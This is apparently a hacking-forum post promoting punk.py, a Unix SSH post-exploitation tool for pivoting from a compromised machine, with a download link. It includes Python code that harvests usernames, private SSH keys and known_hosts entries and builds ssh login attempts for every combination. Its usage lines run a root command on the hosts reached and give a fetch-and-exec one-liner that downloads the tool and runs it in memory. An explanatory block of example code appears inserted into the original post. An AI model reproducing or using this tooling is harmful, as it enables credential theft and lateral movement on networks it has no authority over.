Punk.Py - Unix SSH Post-Exploitation Tool

DeeZNuTz (Master, Staff member)
May 15, 2017
How it works
punk.py is a post-exploitation tool meant to help with network pivoting from a compromised Unix box. It collects usernames, SSH private keys and known_hosts entries from the compromised system, then tries to connect via SSH to every user/host/key combination it found. punk.py is written to work on standard Python 2 and Python 3 installations.
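The collection step described above, as an added example (this is not punk.py's own code, which is not reproduced on this page). It runs under Python 3 over constructed sample data: the passwd and known_hosts contents are made up, the function names (parse_passwd, parse_known_hosts, find_private_keys, collect, build_candidates, ssh_command) are this example's own, and the home_root parameter only approximates what the tool's --home option does. Hashed known_hosts lines are skipped rather than bruteforced, in line with the TODO list further down. Nothing here opens a network connection.

```python
# Added example (not punk.py's own code): the collection step a punk.py-style
# pivot tool runs before trying SSH logins. All input is constructed. Python 3.
import os
import re
import tempfile

# Constructed /etc/passwd content (assumption: the standard 7-field layout).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
"""
# Constructed known_hosts: plain hosts, a comma-separated alias list, a
# non-default port and a hashed entry (skipped, since the tool's TODO says it
# cannot use those yet). Key material is truncated on purpose.
SAMPLE_KNOWN_HOSTS = """\
# comment line
10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHx...
db01,10.0.0.6 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ...
[bastion.internal]:2222 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTY...
|1|SALT=|HASH= ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB...
"""
MIN_UID = 1000  # assumption: interactive accounts start at UID 1000

def parse_passwd(text, min_uid=MIN_UID):
    """{username: home} for root and login-shell accounts with uid >= min_uid."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or parts[6].endswith(("nologin", "false")):
            continue  # malformed line or service account: not worth an attempt
        if int(parts[2]) == 0 or int(parts[2]) >= min_uid:
            users[parts[0]] = parts[5]
    return users

def parse_known_hosts(text):
    """[(host, port)] from known_hosts; hashed |1| lines need bruteforce, so skip."""
    targets = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "|1|")):
            continue
        for entry in line.split()[0].split(","):  # "h1,h2 keytype key"
            m = re.match(r"^\[(.+)\]:(\d+)$", entry)  # "[host]:port" form
            targets.append((m.group(1), int(m.group(2))) if m else (entry, 22))
    return targets

def find_private_keys(home):
    """Files under home/.ssh whose header marks them as a private key."""
    sshdir = os.path.join(home, ".ssh")
    if not os.path.isdir(sshdir):
        return []
    keys = []
    for name in sorted(os.listdir(sshdir)):
        path = os.path.join(sshdir, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                if b"PRIVATE KEY-----" in fh.read(64):
                    keys.append(path)
    return keys

def collect(passwd_text, home_root):
    """Gather users, hosts, keys under home_root (stands in for --home; assumption)."""
    users = parse_passwd(passwd_text)
    hosts, keys = [], []
    for home in users.values():
        home = os.path.join(home_root, os.path.basename(home))
        kh = os.path.join(home, ".ssh", "known_hosts")
        if os.path.isfile(kh):
            with open(kh) as fh:
                hosts.extend(parse_known_hosts(fh.read()))
        keys.extend(find_private_keys(home))
    return users, list(dict.fromkeys(hosts)), keys  # dedupe, keep order

def build_candidates(users, hosts, keys):
    """Every (user, host, port, key) combination the tool would try."""
    return [(u, h, p, k) for u in sorted(users) for h, p in hosts for k in keys]

def ssh_command(user, host, port, key):
    """Non-interactive ssh for one candidate; BatchMode=yes makes ssh fail
    instead of prompting, so the loop never hangs on a passphrase-protected key."""
    return ["ssh", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no",
            "-o", "ConnectTimeout=5", "-i", key, "-p", str(port),
            "%s@%s" % (user, host), "id"]

def demo():
    """Build a fake home tree in a temp dir and run the pipeline over it."""
    with tempfile.TemporaryDirectory() as tmp:
        alice = os.path.join(tmp, "alice", ".ssh")
        os.makedirs(alice)  # root and bob get no home dir at all
        with open(os.path.join(alice, "known_hosts"), "w") as fh:
            fh.write(SAMPLE_KNOWN_HOSTS)
        with open(os.path.join(alice, "id_ed25519"), "w") as fh:
            fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed, not a key\n")
        users, hosts, keys = collect(SAMPLE_PASSWD, tmp)
        cands = build_candidates(users, hosts, keys)
        return users, hosts, [os.path.basename(k) for k in keys], cands

if __name__ == "__main__":
    for user, host, port, key in demo()[3]:
        print(" ".join(ssh_command(user, host, port, key)))
```

Running it prints one ssh command line per candidate (three users times four hosts times one key here) without invoking ssh. BatchMode=yes is the option worth remembering for any loop of this kind: without it a single passphrase-protected key stalls the whole run on a prompt, and the tool has no passphrase handling yet (see the TODO list).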

Examples
Standard execution:
~$ ./punk.py

Skip passwd checks and use a custom home path:
~$ ./punk.py --no-passwd --home /home/ldapusers/

Execute a command (here with sudo) on the hosts reached:
~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

Fileless one-liner (with the --no-passwd parameter; Python 2 only, since urllib2 does not exist in Python 3, and the downloaded script is exec()'d in the current interpreter):
~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO
Improve private key hunting, including DSA keys
Recursion (pivot again from each host reached)
Passphrase bruteforce for protected SSH keys
Hashed known_hosts bruteforce (https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/)

Download Punk.Py